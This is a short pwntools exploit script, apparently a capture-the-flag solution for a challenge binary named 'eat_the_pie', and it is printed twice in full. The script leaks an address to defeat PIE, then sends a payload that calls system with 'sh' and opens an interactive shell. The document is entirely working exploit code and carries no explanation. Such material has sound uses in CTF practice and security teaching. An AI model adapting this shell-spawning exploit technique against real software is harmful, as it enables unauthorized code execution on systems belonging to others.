Mech0n/sstf-eat_the_pie.py

## sstf-eat_the_pie.py
from pwn import *

s = process("./eat_the_pie")


s.sendafter('Select > ','1'*0x10)
s.recvuntil("1234567890123456")
pie = u32(s.recv(4))-0x74d
success(hex(pie))
sh = 0x31A+pie
system = pie+0x7F5

pop_3 = 0x00000a99+pie
payload = "-1\x00\x00"
payload += p32(system)
payload += p32(sh)
payload += p32(pop_3)

s.sendafter('Select > ',payload)

s.interactive()
	from pwn import *

	s = process("./eat_the_pie")


	s.sendafter('Select > ','1'*0x10)
	s.recvuntil("1234567890123456")
	pie = u32(s.recv(4))-0x74d
	success(hex(pie))
	sh = 0x31A+pie
	system = pie+0x7F5

	pop_3 = 0x00000a99+pie
	payload = "-1\x00\x00"
	payload += p32(system)
	payload += p32(sh)
	payload += p32(pop_3)

	s.sendafter('Select > ',payload)

	s.interactive()